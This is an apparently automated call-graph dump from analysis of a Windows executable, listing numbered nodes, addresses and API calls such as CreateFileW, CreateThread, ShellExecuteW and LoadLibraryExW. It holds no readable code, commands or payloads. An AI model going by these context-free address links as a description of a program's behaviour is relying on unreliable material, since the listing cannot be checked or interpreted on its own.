97356->96852 97357->96852 97359 6239eb 97358->97359 97360 625f4e 97358->97360 97359->97336 97392 68d11f 42 API calls _strftime 97359->97392 97360->97359 97361 665070 DestroyIcon 97360->97361 97361->97359 97363 6261c6 97362->97363 97364 6262a8 97362->97364 97365 627ad5 8 API calls 97363->97365 97364->97341 97366 6261d4 97365->97366 97367 6261e1 97366->97367 97368 665278 LoadStringW 97366->97368 97369 628577 8 API calls 97367->97369 97371 665292 97368->97371 97370 6261f6 97369->97370 97372 626203 97370->97372 97379 6652ae 97370->97379 97374 62bed9 8 API calls 97371->97374 97377 626229 ___scrt_fastfail 97371->97377 97372->97371 97373 62620d 97372->97373 97375 626b7c 8 API calls 97373->97375 97374->97377 97376 62621b 97375->97376 97378 627bb5 8 API calls 97376->97378 97381 62628e Shell_NotifyIconW 97377->97381 97378->97377 97379->97377 97380 6652f1 97379->97380 97382 62bf73 8 API calls 97379->97382 97394 63fe6f 51 API calls 97380->97394 97381->97364 97383 6652d8 97382->97383 97393 68a350 9 API calls 97383->97393 97386 6652e3 97388 627bb5 8 API calls 97386->97388 97387 665310 97389 626b7c 8 API calls 97387->97389 97388->97380 97390 665321 97389->97390 97391 626b7c 8 API calls 97390->97391 97391->97377 97392->97336 97393->97386 97394->97387 97395->97352 97396->97354 97397->97351 97408 68e80e 97398->97408 97400 68ddd4 Process32NextW 97401 68de86 CloseHandle 97400->97401 97407 68ddcd 97400->97407 97401->96865 97402 62bf73 8 API calls 97402->97407 97403 62b329 8 API calls 97403->97407 97404 62568e 8 API calls 97404->97407 97405 627bb5 8 API calls 97405->97407 97407->97400 97407->97401 97407->97402 97407->97403 97407->97404 97407->97405 97414 63e36b 41 API calls 97407->97414 97409 68e819 97408->97409 97410 68e830 97409->97410 97413 68e836 97409->97413 97415 646722 GetStringTypeW _strftime 97409->97415 97416 64666b 39 API calls _strftime 97410->97416 97413->97407 97414->97407 97415->97409 97416->97413 97418 64017b 8 API calls 97417->97418 97419 63c209 97418->97419 97420 64014b 8 API calls 97419->97420 97421 63c215 97420->97421 97421->96874 97423 63fa35 97422->97423 97424 63f9fe 97422->97424 97434 63fe8a 8 API calls 97423->97434 97425 64017b 8 API calls 97424->97425 97427 63fa05 WideCharToMultiByte 97425->97427 97433 63fa3e 8 API calls __fread_nolock 97427->97433 97429 63fa29 97429->96879 97431 64014b 8 API calls 97430->97431 97432 62424e 97431->97432 97432->96886 97432->96887 97433->97429 97434->97429 97435->96899 97436->96910 97437->96916 97438->96910 97439->96932 97440->96910 97441->96684 97442->96684 97443->96692 97444->96689 97445->96581 97446->96578 97447->96579 97448->96579 97449 621044 97454 622793 97449->97454 97451 62104a 97490 640413 29 API calls __onexit 97451->97490 97453 621054 97491 622a38 97454->97491 97458 62280a 97459 62bf73 8 API calls 97458->97459 97460 622814 97459->97460 97461 62bf73 8 API calls 97460->97461 97462 62281e 97461->97462 97463 62bf73 8 API calls 97462->97463 97464 622828 97463->97464 97465 62bf73 8 API calls 97464->97465 97466 622866 97465->97466 97467 62bf73 8 API calls 97466->97467 97468 622932 97467->97468 97501 622dbc 97468->97501 97472 622964 97473 62bf73 8 API calls 97472->97473 97474 62296e 97473->97474 97475 633160 9 API calls 97474->97475 97476 622999 97475->97476 97528 623166 97476->97528 97478 6229b5 97479 6229c5 GetStdHandle 97478->97479 97480 6639e7 97479->97480 97481 622a1a 97479->97481 97480->97481 97482 6639f0 97480->97482 97484 622a27 OleInitialize 97481->97484 97483 64014b 8 API calls 97482->97483 97485 6639f7 97483->97485 97484->97451 97535 690ac4 InitializeCriticalSectionAndSpinCount InterlockedExchange GetCurrentProcess GetCurrentProcess DuplicateHandle 97485->97535 97487 663a00 97536 6912eb CreateThread 97487->97536 97489 663a0c CloseHandle 97489->97481 97490->97453 97537 622a91 97491->97537 97494 622a91 8 API calls 97495 622a70 97494->97495 97496 62bf73 8 API calls 97495->97496 97497 622a7c 97496->97497 97498 628577 8 API calls 97497->97498 97499 6227c9 97498->97499 97500 62327e 6 API calls 97499->97500 97500->97458 97502 62bf73 8 API calls 97501->97502 97503 622dcc 97502->97503 97504 62bf73 8 API calls 97503->97504 97505 622dd4 97504->97505 97544 6281d6 97505->97544 97508 6281d6 8 API calls 97509 622de4 97508->97509 97510 62bf73 8 API calls 97509->97510 97511 622def 97510->97511 97512 64014b 8 API calls 97511->97512 97513 62293c 97512->97513 97514 623205 97513->97514 97515 623213 97514->97515 97516 62bf73 8 API calls 97515->97516 97517 62321e 97516->97517 97518 62bf73 8 API calls 97517->97518 97519 623229 97518->97519 97520 62bf73 8 API calls 97519->97520 97521 623234 97520->97521 97522 62bf73 8 API calls 97521->97522 97523 62323f 97522->97523 97524 6281d6 8 API calls 97523->97524 97525 62324a 97524->97525 97526 64014b 8 API calls 97525->97526 97527 623251 RegisterWindowMessageW 97526->97527 97527->97472 97529 623176 97528->97529 97530 663c8f 97528->97530 97532 64014b 8 API calls 97529->97532 97547 693c4e 8 API calls 97530->97547 97534 62317e 97532->97534 97533 663c9a 97534->97478 97535->97487 97536->97489 97548 6912d1 14 API calls 97536->97548 97538 62bf73 8 API calls 97537->97538 97539 622a9c 97538->97539 97540 62bf73 8 API calls 97539->97540 97541 622aa4 97540->97541 97542 62bf73 8 API calls 97541->97542 97543 622a66 97542->97543 97543->97494 97545 62bf73 8 API calls 97544->97545 97546 622ddc 97545->97546 97546->97508 97547->97533 97549 62f5e5 97552 62cab0 97549->97552 97553 62cacb 97552->97553 97554 6714be 97553->97554 97555 67150c 97553->97555 97575 62caf0 97553->97575 97558 6714c8 97554->97558 97561 6714d5 97554->97561 97554->97575 97596 6a62ff 207 API calls 2 library calls 97555->97596 97594 6a6790 207 API calls 97558->97594 97560 63bc58 8 API calls 97560->97575 97574 62cdc0 97561->97574 97595 6a6c2d 207 API calls 2 library calls 97561->97595 97564 67179f 97564->97564 97566 62cf80 39 API calls 97566->97575 97568 63e807 39 API calls 97568->97575 97570 62cdee 97571 6716e8 97599 6a6669 81 API calls 97571->97599 97574->97570 97600 693fe1 81 API calls __wsopen_s 97574->97600 97575->97560 97575->97566 97575->97568 97575->97570 97575->97571 97575->97574 97580 630340 207 API calls 97575->97580 97581 62bed9 8 API calls 97575->97581 97583 62be2d 97575->97583 97587 63e7c1 39 API calls 97575->97587 97588 63aa99 207 API calls 97575->97588 97589 6405b2 5 API calls __Init_thread_wait 97575->97589 97590 640413 29 API calls __onexit 97575->97590 97591 640568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97575->97591 97592 63f4df 81 API calls 97575->97592 97593 63f346 207 API calls 97575->97593 97597 62b4c8 8 API calls 97575->97597 97598 67ffaf 8 API calls 97575->97598 97580->97575 97581->97575 97584 62be38 97583->97584 97585 62be67 97584->97585 97601 62bfa5 39 API calls 97584->97601 97585->97575 97587->97575 97588->97575 97589->97575 97590->97575 97591->97575 97592->97575 97593->97575 97594->97561 97595->97574 97596->97575 97597->97575 97598->97575 97599->97574 97600->97564 97601->97585 97602 658782 97607 65853e 97602->97607 97606 6587aa 97608 65856f try_get_first_available_module 97607->97608 97618 6586b8 97608->97618 97622 64917b 40 API calls 2 library calls 97608->97622 97610 65876e 97626 652b5c 26 API calls pre_c_initialization 97610->97626 97612 6586c3 97612->97606 97619 660d04 97612->97619 97614 65870c 97614->97618 97623 64917b 40 API calls 2 library calls 97614->97623 97616 65872b 97616->97618 97624 64917b 40 API calls 2 library calls 97616->97624 97618->97612 97625 64f649 20 API calls __dosmaperr 97618->97625 97627 660401 97619->97627 97621 660d1f 97621->97606 97622->97614 97623->97616 97624->97618 97625->97610 97626->97612 97630 66040d ___BuildCatchObject 97627->97630 97628 66041b 97685 64f649 20 API calls __dosmaperr 97628->97685 97630->97628 97632 660454 97630->97632 97631 660420 97686 652b5c 26 API calls pre_c_initialization 97631->97686 97638 6609db 97632->97638 97637 66042a __fread_nolock 97637->97621 97688 6607af 97638->97688 97641 660a26 97706 655594 97641->97706 97642 660a0d 97720 64f636 20 API calls __dosmaperr 97642->97720 97645 660a2b 97646 660a34 97645->97646 97647 660a4b 97645->97647 97722 64f636 20 API calls __dosmaperr 97646->97722 97719 66071a CreateFileW 97647->97719 97651 660a39 97723 64f649 20 API calls __dosmaperr 97651->97723 97652 660a84 97654 660b01 GetFileType 97652->97654 97656 660ad6 GetLastError 97652->97656 97724 66071a CreateFileW 97652->97724 97655 660b0c GetLastError 97654->97655 97660 660b53 97654->97660 97726 64f613 20 API calls __dosmaperr 97655->97726 97725 64f613 20 API calls __dosmaperr 97656->97725 97659 660b1a CloseHandle 97662 660a12 97659->97662 97663 660b43 97659->97663 97728 6554dd 21 API calls 2 library calls 97660->97728 97721 64f649 20 API calls __dosmaperr 97662->97721 97727 64f649 20 API calls __dosmaperr 97663->97727 97665 660ac9 97665->97654 97665->97656 97667 660b74 97669 660bc0 97667->97669 97729 66092b 72 API calls 3 library calls 97667->97729 97668 660b48 97668->97662 97673 660bed 97669->97673 97730 6604cd 72 API calls 4 library calls 97669->97730 97672 660be6 97672->97673 97674 660bfe 97672->97674 97731 658a2e 97673->97731 97676 660478 97674->97676 97677 660c7c CloseHandle 97674->97677 97687 6604a1 LeaveCriticalSection __wsopen_s 97676->97687 97746 66071a CreateFileW 97677->97746 97679 660ca7 97680 660cdd 97679->97680 97681 660cb1 GetLastError 97679->97681 97680->97676 97747 64f613 20 API calls __dosmaperr 97681->97747 97683 660cbd 97748 6556a6 21 API calls 2 library calls 97683->97748 97685->97631 97686->97637 97687->97637 97689 6607ea 97688->97689 97690 6607d0 97688->97690 97749 66073f 97689->97749 97690->97689 97756 64f649 20 API calls __dosmaperr 97690->97756 97693 6607df 97757 652b5c 26 API calls pre_c_initialization 97693->97757 97695 660822 97696 660851 97695->97696 97758 64f649 20 API calls __dosmaperr 97695->97758 97699 6608a4 97696->97699 97760 64da7d 26 API calls 2 library calls 97696->97760 97699->97641 97699->97642 97700 66089f 97700->97699 97702 66091e 97700->97702 97701 660846 97759 652b5c 26 API calls pre_c_initialization 97701->97759 97761 652b6c 11 API calls _abort 97702->97761 97705 66092a 97707 6555a0 ___BuildCatchObject 97706->97707 97764 6532d1 EnterCriticalSection 97707->97764 97709 6555a7 97710 6555cc 97709->97710 97715 65563a EnterCriticalSection 97709->97715 97717 6555ee 97709->97717 97768 655373 97710->97768 97713 655617 __fread_nolock 97713->97645 97716 655647 LeaveCriticalSection 97715->97716 97715->97717 97716->97709 97765 65569d 97717->97765 97719->97652 97720->97662 97721->97676 97722->97651 97723->97662 97724->97665 97725->97662 97726->97659 97727->97668 97728->97667 97729->97669 97730->97672 97794 655737 97731->97794 97733 658a3e 97734 658a44 97733->97734 97735 658a76 97733->97735 97737 655737 __wsopen_s 26 API calls 97733->97737 97807 6556a6 21 API calls 2 library calls 97734->97807 97735->97734 97738 655737 __wsopen_s 26 API calls 97735->97738 97741 658a6d 97737->97741 97742 658a82 CloseHandle 97738->97742 97739 658a9c 97740 658abe 97739->97740 97808 64f613 20 API calls __dosmaperr 97739->97808 97740->97676 97744 655737 __wsopen_s 26 API calls 97741->97744 97742->97734 97745 658a8e GetLastError 97742->97745 97744->97735 97745->97734 97746->97679 97747->97683 97748->97680 97752 660757 97749->97752 97750 660772 97750->97695 97752->97750 97762 64f649 20 API calls __dosmaperr 97752->97762 97753 660796 97763 652b5c 26 API calls pre_c_initialization 97753->97763 97755 6607a1 97755->97695 97756->97693 97757->97689 97758->97701 97759->97696 97760->97700 97761->97705 97762->97753 97763->97755 97764->97709 97776 653319 LeaveCriticalSection 97765->97776 97767 6556a4 97767->97713 97777 654ff0 97768->97777 97770 655392 97785 652d38 97770->97785 97771 655385 97771->97770 97784 653778 11 API calls 2 library calls 97771->97784 97774 6553e4 97774->97717 97775 6554ba EnterCriticalSection 97774->97775 97775->97717 97776->97767 97782 654ffd pre_c_initialization 97777->97782 97778 65503d 97792 64f649 20 API calls __dosmaperr 97778->97792 97779 655028 RtlAllocateHeap 97780 65503b 97779->97780 97779->97782 97780->97771 97782->97778 97782->97779 97791 64521d 7 API calls 2 library calls 97782->97791 97784->97771 97786 652d43 RtlFreeHeap 97785->97786 97790 652d6c __dosmaperr 97785->97790 97787 652d58 97786->97787 97786->97790 97793 64f649 20 API calls __dosmaperr 97787->97793 97789 652d5e GetLastError 97789->97790 97790->97774 97791->97782 97792->97780 97793->97789 97795 655744 97794->97795 97796 655759 97794->97796 97809 64f636 20 API calls __dosmaperr 97795->97809 97801 65577e 97796->97801 97811 64f636 20 API calls __dosmaperr 97796->97811 97799 655749 97810 64f649 20 API calls __dosmaperr 97799->97810 97801->97733 97802 655789 97812 64f649 20 API calls __dosmaperr 97802->97812 97803 655751 97803->97733 97805 655791 97813 652b5c 26 API calls pre_c_initialization 97805->97813 97807->97739 97808->97740 97809->97799 97810->97803 97811->97802 97812->97805 97813->97803 97814 64f06e 97815 64f07a ___BuildCatchObject 97814->97815 97816 64f086 97815->97816 97817 64f09b 97815->97817 97833 64f649 20 API calls __dosmaperr 97816->97833 97827 6494fd EnterCriticalSection 97817->97827 97820 64f08b 97834 652b5c 26 API calls pre_c_initialization 97820->97834 97821 64f0a7 97828 64f0db 97821->97828 97826 64f096 __fread_nolock 97827->97821 97836 64f106 97828->97836 97830 64f0e8 97832 64f0b4 97830->97832 97856 64f649 20 API calls __dosmaperr 97830->97856 97835 64f0d1 LeaveCriticalSection __fread_nolock 97832->97835 97833->97820 97834->97826 97835->97826 97837 64f114 97836->97837 97838 64f12e 97836->97838 97867 64f649 20 API calls __dosmaperr 97837->97867 97857 64dcc5 97838->97857 97841 64f119 97868 652b5c 26 API calls pre_c_initialization 97841->97868 97842 64f137 97864 659789 97842->97864 97846 64f23b 97847 64f248 97846->97847 97852 64f1ee 97846->97852 97870 64f649 20 API calls __dosmaperr 97847->97870 97848 64f1bf 97850 64f1dc 97848->97850 97848->97852 97869 64f41f 31 API calls 4 library calls 97850->97869 97854 64f124 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 97852->97854 97871 64f29b 30 API calls 2 library calls 97852->97871 97853 64f1e6 97853->97854 97854->97830 97856->97832 97858 64dce6 97857->97858 97859 64dcd1 97857->97859 97858->97842 97872 64f649 20 API calls __dosmaperr 97859->97872 97861 64dcd6 97873 652b5c 26 API calls pre_c_initialization 97861->97873 97863 64dce1 97863->97842 97874 659606 97864->97874 97866 64f153 97866->97846 97866->97848 97866->97854 97867->97841 97868->97854 97869->97853 97870->97854 97871->97854 97872->97861 97873->97863 97875 659612 ___BuildCatchObject 97874->97875 97876 65961a 97875->97876 97880 659632 97875->97880 97909 64f636 20 API calls __dosmaperr 97876->97909 97878 6596e6 97914 64f636 20 API calls __dosmaperr 97878->97914 97880->97878 97883 65966a 97880->97883 97881 65961f 97910 64f649 20 API calls __dosmaperr 97881->97910 97882 6596eb 97915 64f649 20 API calls __dosmaperr 97882->97915 97899 6554ba EnterCriticalSection 97883->97899 97887 6596f3 97916 652b5c 26 API calls pre_c_initialization 97887->97916 97888 659670 97890 659694 97888->97890 97891 6596a9 97888->97891 97911 64f649 20 API calls __dosmaperr 97890->97911 97900 65970b 97891->97900 97893 659627 __fread_nolock 97893->97866 97895 659699 97912 64f636 20 API calls __dosmaperr 97895->97912 97896 6596a4 97913 6596de LeaveCriticalSection __wsopen_s 97896->97913 97899->97888 97901 655737 __wsopen_s 26 API calls 97900->97901 97902 65971d 97901->97902 97903 659725 97902->97903 97904 659736 SetFilePointerEx 97902->97904 97917 64f649 20 API calls __dosmaperr 97903->97917 97905 65974e GetLastError 97904->97905 97908 65972a 97904->97908 97918 64f613 20 API calls __dosmaperr 97905->97918 97908->97896 97909->97881 97910->97893 97911->97895 97912->97896 97913->97893 97914->97882 97915->97887 97916->97893 97917->97908 97918->97908 97919 673c0a 97940 68c819 97919->97940 97921 673c14 97923 68c819 Sleep 97921->97923 97924 673c3f 97921->97924 97930 62efdb 97921->97930 97946 63aa65 9 API calls 97921->97946 97923->97921 97925 62b329 8 API calls 97924->97925 97926 673c6f 97925->97926 97947 62bfa5 39 API calls 97926->97947 97928 673c8b 97948 69446f 8 API calls 97928->97948 97933 62f450 97930->97933 97932 62f097 97934 62f483 97933->97934 97935 62f46f 97933->97935 97981 693fe1 81 API calls __wsopen_s 97934->97981 97949 62e960 97935->97949 97937 62f47a 97937->97932 97939 674584 97939->97939 97941 68c824 97940->97941 97942 68c83f 97940->97942 97941->97921 97943 68c86d 97942->97943 97944 68c85b Sleep 97942->97944 97943->97921 97944->97943 97946->97921 97947->97928 97948->97932 97950 630340 207 API calls 97949->97950 97951 62e99d 97950->97951 97952 62ea0b messages 97951->97952 97953 6731d3 97951->97953 97955 62edd5 97951->97955 97956 62eac3 97951->97956 97962 62ebb8 97951->97962 97968 64014b 8 API calls 97951->97968 97976 62eb29 __fread_nolock messages 97951->97976 97952->97937 97995 693fe1 81 API calls __wsopen_s 97953->97995 97955->97952 97965 64017b 8 API calls 97955->97965 97956->97955 97957 62eace 97956->97957 97959 64014b 8 API calls 97957->97959 97958 62ecff 97960 6731c4 97958->97960 97961 62ed14 97958->97961 97970 62ead5 __fread_nolock 97959->97970 97994 6a6162 8 API calls 97960->97994 97964 64014b 8 API calls 97961->97964 97966 64017b 8 API calls 97962->97966 97973 62eb6a 97964->97973 97965->97970 97966->97976 97967 64014b 8 API calls 97969 62eaf6 97967->97969 97968->97951 97969->97976 97982 62d260 97969->97982 97970->97967 97970->97969 97972 6731b3 97993 693fe1 81 API calls __wsopen_s 97972->97993 97973->97937 97976->97958 97976->97972 97976->97973 97977 67318e 97976->97977 97979 67316c 97976->97979 97990 6244fe 207 API calls 97976->97990 97992 693fe1 81 API calls __wsopen_s 97977->97992 97991 693fe1 81 API calls __wsopen_s 97979->97991 97981->97939 97983 62d2c6 97982->97983 97984 62d29a 97982->97984 97986 630340 207 API calls 97983->97986 97996 62f6d0 97984->97996 97987 67184b 97986->97987 97988 62d2a0 97987->97988 98019 693fe1 81 API calls __wsopen_s 97987->98019 97988->97976 97988->97988 97990->97976 97991->97973 97992->97973 97993->97973 97994->97953 97995->97952 97997 62f710 97996->97997 98015 62f7dc messages 97997->98015 98021 6405b2 5 API calls __Init_thread_wait 97997->98021 98000 6745d9 98002 62bf73 8 API calls 98000->98002 98000->98015 98001 62bf73 8 API calls 98001->98015 98005 6745f3 98002->98005 98003 62be2d 39 API calls 98003->98015 98022 640413 29 API calls __onexit 98005->98022 98008 6745fd 98023 640568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 98008->98023 98009 630340 207 API calls 98009->98015 98012 62bed9 8 API calls 98012->98015 98013 631ca0 8 API calls 98013->98015 98014 62fae1 98014->97988 98015->98001 98015->98003 98015->98009 98015->98012 98015->98013 98015->98014 98018 693fe1 81 API calls 98015->98018 98020 63b35c 207 API calls 98015->98020 98024 6405b2 5 API calls __Init_thread_wait 98015->98024 98025 640413 29 API calls __onexit 98015->98025 98026 640568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 98015->98026 98027 6a5231 101 API calls 98015->98027 98028 6a731e 207 API calls 98015->98028 98018->98015 98019->97988 98020->98015 98021->98000 98022->98008 98023->98015 98024->98015 98025->98015 98026->98015 98027->98015 98028->98015 98029 64076b 98030 640777 ___BuildCatchObject 98029->98030 98059 640221 98030->98059 98032 64077e 98033 6408d1 98032->98033 98036 6407a8 98032->98036 98097 640baf IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 98033->98097 98035 6408d8 98098 6451c2 28 API calls _abort 98035->98098 98048 6407e7 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 98036->98048 98070 6527ed 98036->98070 98038 6408de 98099 645174 28 API calls _abort 98038->98099 98042 6408e6 98043 6407c7 98045 640848 98078 640cc9 98045->98078 98047 64084e 98082 62331b 98047->98082 98048->98045 98093 64518a 38 API calls 2 library calls 98048->98093 98053 64086a 98053->98035 98054 64086e 98053->98054 98055 640877 98054->98055 98095 645165 28 API calls _abort 98054->98095 98096 6403b0 13 API calls 2 library calls 98055->98096 98058 64087f 98058->98043 98060 64022a 98059->98060 98100 640a08 IsProcessorFeaturePresent 98060->98100 98062 640236 98101 643004 10 API calls 3 library calls 98062->98101 98064 64023b 98069 64023f 98064->98069 98102 652687 98064->98102 98067 640256 98067->98032 98069->98032 98073 652804 98070->98073 98071 640dfc _ValidateLocalCookies 5 API calls 98072 6407c1 98071->98072 98072->98043 98074 652791 98072->98074 98073->98071 98075 6527c0 98074->98075 98076 640dfc _ValidateLocalCookies 5 API calls 98075->98076 98077 6527e9 98076->98077 98077->98048 98153 6426b0 98078->98153 98080 640cdc GetStartupInfoW 98081 640cef 98080->98081 98081->98047 98083 623382 98082->98083 98084 623327 IsThemeActive 98082->98084 98094 640d02 GetModuleHandleW 98083->98094 98155 6452b3 98084->98155 98086 623352 98161 645319 98086->98161 98088 623359 98168 6232e6 SystemParametersInfoW SystemParametersInfoW 98088->98168 98090 623360 98169 62338b 98090->98169 98092 623368 SystemParametersInfoW 98092->98083 98093->98045 98094->98053 98095->98055 98096->98058 98097->98035 98098->98038 98099->98042 98100->98062 98101->98064 98106 65d576 98102->98106 98105 64302d 8 API calls 3 library calls 98105->98069 98108 65d58f 98106->98108 98110 65d593 98106->98110 98124 640dfc 98108->98124 98109 640248 98109->98067 98109->98105 98110->98108 98112 654f6e 98110->98112 98113 654f7a ___BuildCatchObject 98112->98113 98131 6532d1 EnterCriticalSection 98113->98131 98115 654f81 98132 655422 98115->98132 98117 654f90 98118 654f9f 98117->98118 98145 654e02 29 API calls 98117->98145 98147 654fbb LeaveCriticalSection _abort 98118->98147 98121 654f9a 98146 654eb8 GetStdHandle GetFileType 98121->98146 98122 654fb0 __fread_nolock 98122->98110 98125 640e05 98124->98125 98126 640e07 IsProcessorFeaturePresent 98124->98126 98125->98109 98128 640fce 98126->98128 98152 640f91 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 98128->98152 98130 6410b1 98130->98109 98131->98115 98133 65542e ___BuildCatchObject 98132->98133 98134 655452 98133->98134 98135 65543b 98133->98135 98148 6532d1 EnterCriticalSection 98134->98148 98149 64f649 20 API calls __dosmaperr 98135->98149 98138 655440 98150 652b5c 26 API calls pre_c_initialization 98138->98150 98140 65544a __fread_nolock 98140->98117 98141 65548a 98151 6554b1 LeaveCriticalSection _abort 98141->98151 98142 65545e 98142->98141 98144 655373 __wsopen_s 21 API calls 98142->98144 98144->98142 98145->98121 98146->98118 98147->98122 98148->98142 98149->98138 98150->98140 98151->98140 98152->98130 98154 6426c7 98153->98154 98154->98080 98154->98154 98156 6452bf ___BuildCatchObject 98155->98156 98218 6532d1 EnterCriticalSection 98156->98218 98158 6452ca pre_c_initialization 98219 64530a 98158->98219 98160 6452ff __fread_nolock 98160->98086 98162 645325 98161->98162 98163 64533f 98161->98163 98162->98163 98223 64f649 20 API calls __dosmaperr 98162->98223 98163->98088 98165 64532f 98224 652b5c 26 API calls pre_c_initialization 98165->98224 98167 64533a 98167->98088 98168->98090 98170 62339b __wsopen_s 98169->98170 98171 62bf73 8 API calls 98170->98171 98172 6233a7 GetCurrentDirectoryW 98171->98172 98225 624fd9 98172->98225 98174 6233ce IsDebuggerPresent 98175 663ca3 MessageBoxA 98174->98175 98176 6233dc 98174->98176 98178 663cbb 98175->98178 98177 6233f0 98176->98177 98176->98178 98293 623a95 98177->98293 98329 624176 8 API calls 98178->98329 98185 623462 98187 663cec SetCurrentDirectoryW 98185->98187 98188 62346a 98185->98188 98187->98188 98189 623475 98188->98189 98330 681fb0 AllocateAndInitializeSid CheckTokenMembership FreeSid 98188->98330 98325 6234d3 7 API calls 98189->98325 98193 663d07 98193->98189 98195 663d19 98193->98195 98331 625594 98195->98331 98196 62347f 98199 62396b 60 API calls 98196->98199 98202 623494 98196->98202 98198 663d22 98200 62b329 8 API calls 98198->98200 98199->98202 98201 663d30 98200->98201 98204 663d5f 98201->98204 98205 663d38 98201->98205 98203 6234af 98202->98203 98206 623907 Shell_NotifyIconW 98202->98206 98209 6234b6 SetCurrentDirectoryW 98203->98209 98208 626b7c 8 API calls 98204->98208 98207 626b7c 8 API calls 98205->98207 98206->98203 98210 663d43 98207->98210 98211 663d5b GetForegroundWindow ShellExecuteW 98208->98211 98212 6234ca 98209->98212 98214 627bb5 8 API calls 98210->98214 98215 663d90 98211->98215 98212->98092 98216 663d51 98214->98216 98215->98203 98217 626b7c 8 API calls 98216->98217 98217->98211 98218->98158 98222 653319 LeaveCriticalSection 98219->98222 98221 645311 98221->98160 98222->98221 98223->98165 98224->98167 98226 62bf73 8 API calls 98225->98226 98227 624fef 98226->98227 98338 6263d7 98227->98338 98229 62500d 98230 62bd57 8 API calls 98229->98230 98231 625021 98230->98231 98232 62bed9 8 API calls 98231->98232 98233 62502c 98232->98233 98234 62893c 8 API calls 98233->98234 98235 625038 98234->98235 98236 62b329 8 API calls 98235->98236 98237 625045 98236->98237 98238 62be2d 39 API calls 98237->98238 98239 625055 98238->98239 98240 62b329 8 API calls 98239->98240 98241 62507b 98240->98241 98242 62be2d 39 API calls 98241->98242 98243 62508a 98242->98243 98244 62bf73 8 API calls 98243->98244 98245 6250a8 98244->98245 98352 6251ca 98245->98352 98248 644d98 _strftime 40 API calls 98249 6250c2 98248->98249 98250 664b23 98249->98250 98251 6250cc 98249->98251 98252 6251ca 8 API calls 98250->98252 98253 644d98 _strftime 40 API calls 98251->98253 98255 664b37 98252->98255 98254 6250d7 98253->98254 98254->98255 98256 6250e1 98254->98256 98258 6251ca 8 API calls 98255->98258 98257 644d98 _strftime 40 API calls 98256->98257 98259 6250ec 98257->98259 98260 664b53 98258->98260 98259->98260 98261 6250f6 98259->98261 98263 625594 10 API calls 98260->98263 98262 644d98 _strftime 40 API calls 98261->98262 98265 625101 98262->98265 98264 664b76 98263->98264 98266 6251ca 8 API calls 98264->98266 98267 664b9f 98265->98267 98268 62510b 98265->98268 98269 664b82 98266->98269 98271 6251ca 8 API calls 98267->98271 98270 62512e 98268->98270 98273 62bed9 8 API calls 98268->98273 98272 62bed9 8 API calls 98269->98272 98275 664bda 98270->98275 98279 627e12 8 API calls 98270->98279 98274 664bbd 98271->98274 98276 664b90 98272->98276 98277 625121 98273->98277 98278 62bed9 8 API calls 98274->98278 98280 6251ca 8 API calls 98276->98280 98281 6251ca 8 API calls 98277->98281 98282 664bcb 98278->98282 98283 62513e 98279->98283 98280->98267 98281->98270 98285 6251ca 8 API calls 98282->98285 98284 628470 8 API calls 98283->98284 98286 62514c 98284->98286 98285->98275 98287 628a60 8 API calls 98286->98287 98290 625167 98287->98290 98288 62893c 8 API calls 98288->98290 98289 628a60 8 API calls 98289->98290 98290->98288 98290->98289 98291 6251ab 98290->98291 98292 6251ca 8 API calls 98290->98292 98291->98174 98292->98290 98294 623aa2 __wsopen_s 98293->98294 98295 623abb 98294->98295 98296 6640da ___scrt_fastfail 98294->98296 98297 625851 9 API calls 98295->98297 98299 6640f6 GetOpenFileNameW 98296->98299 98298 623ac4 98297->98298 98364 623a57 98298->98364 98301 664145 98299->98301 98303 628577 8 API calls 98301->98303 98305 66415a 98303->98305 98305->98305 98306 623ad9 98382 6262d5 98306->98382 98992 623624 7 API calls 98325->98992 98327 62347a 98328 6235b3 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 98327->98328 98328->98196 98329->98185 98330->98193 98332 6622d0 __wsopen_s 98331->98332 98333 6255a1 GetModuleFileNameW 98332->98333 98334 62b329 8 API calls 98333->98334 98335 6255c7 98334->98335 98336 625851 9 API calls 98335->98336 98337 6255d1 98336->98337 98337->98198 98339 6263e4 __wsopen_s 98338->98339 98340 628577 8 API calls 98339->98340 98341 626416 98339->98341 98340->98341 98342 62655e 8 API calls 98341->98342 98351 62644c 98341->98351 98342->98341 98343 62651a 98344 62b329 8 API calls 98343->98344 98345 62654f 98343->98345 98346 626543 98344->98346 98345->98229 98348 626a7c 8 API calls 98346->98348 98347 62b329 8 API calls 98347->98351 98348->98345 98350 62655e 8 API calls 98350->98351 98351->98343 98351->98347 98351->98350 98358 626a7c 98351->98358 98353 6251f2 98352->98353 98354 6251d4 98352->98354 98356 628577 8 API calls 98353->98356 98355 6250b4 98354->98355 98357 62bed9 8 API calls 98354->98357 98355->98248 98356->98355 98357->98355 98359 626a8b 98358->98359 98363 626aac __fread_nolock 98358->98363 98362 64017b 8 API calls 98359->98362 98360 64014b 8 API calls 98361 626abf 98360->98361 98361->98351 98362->98363 98363->98360 98365 6622d0 __wsopen_s 98364->98365 98366 623a64 GetLongPathNameW 98365->98366 98367 628577 8 API calls 98366->98367 98368 623a8c 98367->98368 98369 6253f2 98368->98369 98370 62bf73 8 API calls 98369->98370 98371 625404 98370->98371 98372 625851 9 API calls 98371->98372 98373 62540f 98372->98373 98374 62541a 98373->98374 98375 664d5b 98373->98375 98376 626a7c 8 API calls 98374->98376 98380 664d7d 98375->98380 98418 63e36b 41 API calls 98375->98418 98378 625426 98376->98378 98412 621340 98378->98412 98381 625439 98381->98306 98419 626679 98382->98419 98385 665336 98544 6936b8 98385->98544 98386 626679 93 API calls 98388 62630e 98386->98388 98388->98385 98390 626316 98388->98390 98394 626322 98390->98394 98395 665353 98390->98395 98392 665368 98393 64017b 8 API calls 98392->98393 98411 6653ad 98393->98411 98441 623b39 98394->98441 98595 68e30e 82 API calls 98395->98595 98399 665361 98399->98392 98413 621352 98412->98413 98417 621371 __fread_nolock 98412->98417 98416 64017b 8 API calls 98413->98416 98414 64014b 8 API calls 98415 621388 98414->98415 98415->98381 98416->98417 98417->98414 98418->98375 98598 62663e LoadLibraryA 98419->98598 98424 6266a4 LoadLibraryExW 98606 626607 LoadLibraryA 